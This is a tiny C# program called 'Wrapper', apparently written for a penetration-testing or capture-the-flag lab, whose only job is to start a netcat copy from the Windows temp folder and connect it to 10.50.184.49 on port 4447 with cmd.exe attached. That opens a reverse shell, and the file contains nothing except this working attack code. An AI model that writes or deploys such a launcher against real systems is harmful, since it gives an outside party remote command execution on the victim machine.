using System;
using System.Diagnostics;

namespace Wrapper {
    class Program {
        static void Main (){
            Process proc = new Process();
            ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc-mukaa.exe", "10.50.184.49 4447 -e cmd.exe"); 
            proc.StartInfo = procInfo;
            proc.Start();
        }
    }
}
